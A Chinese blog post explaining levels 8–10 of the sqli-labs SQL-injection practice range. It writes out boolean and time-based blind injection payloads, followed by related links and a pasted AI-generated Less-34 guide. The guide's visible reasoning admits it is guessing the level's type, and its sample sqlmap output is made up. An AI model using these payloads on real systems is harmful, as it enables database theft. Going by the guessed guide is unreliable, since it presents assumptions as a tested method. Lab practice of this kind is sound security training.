sqli-labs靶场通关详细讲解(附php源码分析Less-8-10)

原创 已于 2025-12-12 14:47:11 修改 · 491 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #sqli-labs #网络安全 #靶场 #Web安全

于 2025-12-12 14:46:31 首次发布

补充知识

length()  返回字符串的长度

substr(1,1,1)  是 SQL 中用于截取字符串子串的函数,广泛用于数据库(如 MySQL、Oracle、PostgreSQL 等),在 SQL 注入(尤其是盲注和报错注入)中常被用来逐字提取数据。参数分别为截取的字符串,起始位置,截取长度

ascii()  返回该字符的ascii码值

Less-8

测试此题目为 ' 闭合,但闭合后页面无回显,也没有报错信息,考虑到使用盲注来测试

?id=1' and (length(database()))=8--+     从1开始测试,只有8页面正常,说明该数据库长度为8

?id=1' and (ascii(substr(database(),1,1)))=115--+  页面正常,说明数据库第一个字母ascii为115 s

?id=1' and (ascii(substr(database(),2,1)))=101--+  第二个字母为e

依次类推,可使用python脚本快速完成,测试出数据库为security

?id=1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1, 1)) = 101 --+   猜解表名

其余只需要修改substr()里面的第一个参数为查询语句即可,查询语句和Less1 类似

补充知识

sleep()  是 MySQL 中的一个时间延迟函数,常用于 时间盲注。当页面无回显、无报错时,攻击者可通过 SLEEP() 观察响应时间差异,间接判断 SQL 条件真假。

if(1,2,3) 是 MySQL 中的 条件判断函数,其含义是:如果条件为真(非0/非NULL),返回第二个参数;否则返回第三个参数。

Less-9

页面无论输入什么都没有变化,并且使用布尔盲注上一题的方法也没有用处,这时考虑另一种方法,采用时间盲注,通过返回页面的时间来判断

?id=1' and if (length(database())=8,sleep(5),1) --+ 

经过测试,数据库长度为8,页面反应时间与其余不一致

?id=1' AND IF(ASCII(SUBSTR(DATABASE(),1,1)) = 115, SLEEP(5), 1) --+  数据库字母为S

?id=1' AND IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1, 1)) = 101, SLEEP(5), 1) --+  猜解表名

其余只需修改substr中的查询语句即可

Less-10

只是闭合条件与Less-9不同,其余步骤一致,此处的闭合条件为 "

Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2481
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3603
sqli-labs-master[超详细通关教程,通关攻略~!](解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
sqli-labs靶场通关详细讲解php源码分析Less-11-16)
2401_83711856的博客
12-14 738
同理可得uname=1' or '1'='1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1, 1)) = 101--+&passwd=1&submit=Submit 猜解表名和列名即可。uname=1' or '1'='1' order by 2--+&passwd=1&submit=Submit 测试为2列。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 21万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs靶场通关攻略
test_zpx的博客
08-14 5618
Good Good Study,Day Day Up!
sqli-labs靶场实战-Basic Challenges通关攻略(一)
m0_66808441的博客
02-26 1908
step 1 --- 进入靶场,在URL后and跟上逻辑判断,and全真则真、有假则假,但逻辑判断的真假并未影响回显内容,所以判断不是数字型注 入。step 3 --- 使用注释符:--+,将后面内容注释掉,使得id='1'正常回显。(正常注释符为:--空格,但在url中往往被写成--+)step 5 --- 确定回显点,即使用union联合查询,找出回显出的内容属于哪2个字段。出现报错情况,--+注释后面内容,若恢复正常,则为闭合方式;step 4 --- 判断字段数,使用 order by。
sqli-labs靶场通关
2402_88319225的博客
11-16 1242
报错函数里面三个参数,我们可以操控的是第二个参数的位置,第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置,我们可以操控的地方也是第二个参数的位置,把第二个参数的位置换成(),里面写我们的子查询语句。查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。表示所有字段对应的表名。数据库有四个表:emails,referers,uagents,users。
sqli-labs靶场通关攻略(1-20关)
kknifek的博客
08-14 1978
sql手工注入
sqli-labs靶场通关攻略 46-50
2301_82061181的博客
08-29 2664
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)步骤一:利用时间盲注查询数据库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 3378
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 1208
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sqli-labssqli-labs 靶场通关(1-16)
m0_71944965的博客
09-02 794
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场sqli-labs 靶场通关(1-16)sqli-labs第一关 sqli-labs第一关 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
SQL server 配置管理器-SQL server 服务-远程过程调试失败 [0x800706be]-(Express LocalDB卸载掉)完美解决!
最新发布
骚团长的博客
12-14 53
下图: 打开SQL server 配置管理器 下图: SQL server 服务正常现象 下图: SQL server 配置管理器-SQL server 服务-远程过程调试失败 [0x800706be] 下图: 原来我刚刚新安装了VS 2015(Visual Studio 2015) 下图: Visual Studio 安装日期与SQL Server 安装日期(我3年前就安装了SQL,以前一直用的好好的,最近刚刚改了密码与新装VS) 下图: 把“罪魁祸...
从 Oracle 到 SQL Server:金仓数据库迁移落地与社区支撑指南
稻草人
12-13 400
金仓数据库KingbaseES在信创产业中展现出强劲竞争力,特别是在Oracle迁移适配方面表现突出。其内置迁移工具支持99%以上PL/SQL语法兼容,可视化操作实现全量迁移成功率超99%,相比达梦等产品改造量减少15%-20%。在政务和金融行业实践中,金仓能实现存储过程零改造迁移,并发量达10万TPS,与Oracle性能持平。针对SQLServer迁移,其XML函数和时间日期处理与源库保持100%行为一致性。金仓社区提供丰富迁移案例库和测试工具包,显著降低企业转型难度,是信创数据库国产化的优选方案。
SQLAlchemy 核心 API 深度解析:超越 ORM 的数据库工具包
不懂先生的博客
12-13 357
SQLAlchemy Core 提供了强大的表结构定义能力,支持复杂的约束、索引和数据类型。# 示例:高级表结构定义# 枚举类型定义# 约束定义# 索引定义# 关联表示例SQLAlchemy 允许深度定制,包括创建自定义数据类型和扩展 SQL 编译器。# 示例:创建自定义 JSON 查询过滤器"""自定义 JSON 路径查询表达式"""operator=None # 自定义操作符"""为 PostgreSQL 编译 JSON 路径查询"""# 使用自定义 JSON 路径查询# )
MySQLSQL 注入
csbysj2020
12-11 477
MySQL 是一款开源的关系型数据库管理系统,由瑞典 MySQL AB 公司开发。它遵循 GNU 通用公共许可证(GPL),可以在商业和非商业环境下使用。MySQL 支持多种编程语言,如 C、C++、Java、PHP、Python 等,并且拥有丰富的扩展功能和优秀的性能。SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在 SQL 语句中插入恶意代码,从而获取数据库的控制权限。攻击者可以利用 SQL 注入攻击,窃取敏感数据、修改数据、删除数据、执行任意命令等。
SQL篇——【MySQL篇:SQL理论】SQL 与关系型数据库核心要点详解
2403_88453964的博客
12-12 1078
本文系统介绍了关系型数据库的核心概念与SQL操作指南。主要内容包括:1.关系型数据库基础概念,包括主流数据库产品对比;2.SQL语言详解,涵盖DDL(数据定义)、DML(数据操作)、DQL(数据查询)和DCL(数据控制)四大类语法;3.数据库函数与约束机制,包括字符串、数值、日期函数及主键、外键等约束类型;4.多表查询技术,涉及内连接、外连接、子查询等复杂查询方法;5.事务管理,详细说明ACID特性、隔离级别及并发控制。全文采用示例驱动的讲解方式,提供大量实用SQL代码片段,适合作为关系型数据库学习的系统参
Java @Mapper 使用注解的方式注入SQL
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
12-11 1025
MySQL 的 JSON 数据类型(从 MySQL 5.7.8 开始支持)允许你在表中存储和处理 JSON 格式的数据。 JSON 数据类型提供了灵活性,但应谨慎使用。对于需要复杂查询、索引或关系约束的数据,传统的关系表结构通常是更好的选择。
sqli-labs靶场通关less34
11-29
<think> 首先,用户查询的是sqli-labs靶场less34关卡的通关方法。Sqli-labs是一个用于学习SQL注入的靶场less34可能指的是第34关。 从提供的引用来看: - 引用[1]提到了Sqli-labs-less-9,涉及到SQL注入的条件。 - 引用[2]列出了从less54到less65的一些通关方法,包括注入示例。 - 引用[3]提到了第十关。 - 引用[4]是关于第12关的,使用post请求和sqlmap。 用户的具体问题是关于less34的,但引用中没有直接提到less34。我需要基于SQL注入的常识来构建一个合理的通关方法。 回想一下,Sqli-labs的关卡通常涉及不同类型的SQL注入: - Less34可能是基于post请求的注入,因为引用[4]提到post请求。 - 一般关卡名如less34可能对应特定的漏洞类型,比如基于时间的盲注或错误注入。 在标准Sqli-labs中: - Less1-10是基本的注入。 - Less34可能是一个特定的关卡,我需要假设它是基于post请求的注入,因为用户提到"less34",而引用[4]是关于post请求的。 用户说:"我想获取sqli - labs靶场less34关卡的通关方法",所以我需要提供步骤。 从系统指令: - 我必须使用中文回答。 - 行内数学表达式用$...$,但这里可能不涉及数学,所以可能不需要。 - 独立公式用$$...$$,但同样可能不需要。 - 生成相关问题。 - 在回答中引用的段落末尾添加引用标识,如[^1]。 引用部分在用户消息中是给定的,所以我应该参考它们。引用[2]提到了各种注入方法,如updatexml的使用,这在盲注中常见。 构建回答: 1. 解释关卡:假设less34是一个post请求的注入关卡。 2. 步骤: - 识别注入点。 - 测试注入类型(基于错误、布尔盲注、时间盲注)。 - 使用工具如sqlmap或手动注入。 3. 基于引用[4],提到使用burp抓包和sqlmap。 可能的通关方法: - 使用burp suite抓取请求。 - 保存请求到文件。 -sqlmap扫描。 - 或者手动注入,如使用' or 1=1 -- 等。 添加引用:在相关部分末尾添加[^数字]。 生成相关问题: - 例如:1. 如何手动测试SQL注入漏洞?2. sqlmap工具的使用方法?3. 如何防御SQL注入? 确保回答结构清晰: - 引言:介绍less34。 - 步骤:详细步骤。 - 代码示例:如果有。 - 相关问题。 最终回答格式: - 使用中文。 - 自然添加引用。 - 结尾有相关问题。 </think>### Sqli-labs 靶场 Less-34 通关详解 Sqli-labsLess-34 关卡通常涉及基于 POST 请求的 SQL 注入漏洞,目标是通过注入获取数据库信息(如数据库名、表名或用户数据)。这一关可能需要使用工具辅助测试,因为它是 POST 表单提交的场景。以下是基于 SQL 注入原理和常见靶场实践的逐步通关方法(假设靶场环境已搭建好)。 #### 步骤 1: 识别注入点 - **访问关卡页面**:打开 Less-34 页面(URL 类似 `http://localhost/sqli-labs/Less-34/`)。页面通常包含一个登录表单(用户名和密码输入框),这是潜在的注入点。 - **测试参数可控性**:输入单引号 `'` 或其他特殊字符(如 `"` 或 `\`),观察页面响应。如果出现数据库错误(如 MySQL 语法错误),则表明参数未充分过滤,存在注入漏洞。SQL 注入的三个条件包括参数可控、过滤不彻底和参数带入数据库执行[^1]。 - **示例测试**: - 在用户名框输入 `' or 1=1 -- `(注意末尾空格),密码框随意输入(如 `test`)。如果登录成功,说明存在布尔盲注漏洞。 #### 步骤 2: 手动注入测试(基于错误) - **利用错误回显**:Less-34 可能支持基于错误的注入,使用 `updatexml()` 函数提取信息。这在类似关卡(如 Less-58)中常见[^2]。 - 在用户名框输入:`' and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) -- ` - 密码框输入任意值(如 `123`)。 - **解释**:`updatexml()` 会触发 XML 解析错误,并回显当前数据库名(`database()`)。错误消息中会包含 `~database_name~` 格式的信息。 - 如果成功,错误消息会显示数据库名(如 `~security~`)。 - **获取更多数据**: - 查询表名:替换注入 payload 为 `' and updatexml(1, concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1), 0x7e), 1) -- `。这会返回第一个表名。 - 查询列名:如 `' and updatexml(1, concat(0x7e, (select column_name from information_schema.columns where table_name='users' limit 0,1), 0x7e), 1) -- `,获取 `users` 表的列名。 #### 步骤 3: 使用 sqlmap 自动化工具(推荐) 对于 POST 请求,手动注入可能繁琐,sqlmap 能自动完成漏洞利用。参考 Less-12 的方法[^4]: 1. **捕获请求**:使用 Burp Suite 抓包。 - 提交表单(如用户名 `test`,密码 `test`),Burp 会捕获 POST 请求。 - 保存请求数据到文件(如 `less34.txt`),内容示例: ``` POST /sqli-labs/Less-34/ HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 25 uname=test&passwd=test ``` 2. **运行 sqlmap**: - 命令:`sqlmap -r less34.txt --batch --dbs`(`--batch` 自动确认,`--dbs` 获取所有数据库名)。 - 如果注入点正确,sqlmap 会返回数据库列表(如 `security`)。 - 进一步获取表名:`sqlmap -r less34.txt --batch -D security --tables`。 - 获取数据:`sqlmap -r less34.txt --batch -D security -T users --dump`(导出 `users` 表数据)。 3. **结果示例**:成功后会显示类似: ``` Database: security Table: users +----+----------+------------+ | id | username | password | +----+----------+------------+ | 1 | admin | admin_pass | +----+----------+------------+ ``` #### 关键注意事项 - **防御绕过**:如果关卡有过滤,尝试编码 payload(如 URL 编码 `'` 为 `%27`)。 - **环境依赖**:确保靶场运行正常(如使用 Docker 或 XAMPP)。如果注入失败,检查错误日志或调整 payload。 - **原理引用**:SQL 注入的核心是参数未过滤导致恶意代码执行[^1],本方法基于常见盲注技术[^2][^4]。 通过以上步骤,您应能成功通关 Less-34。如果遇到问题,可提供具体错误截图以便进一步诊断。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值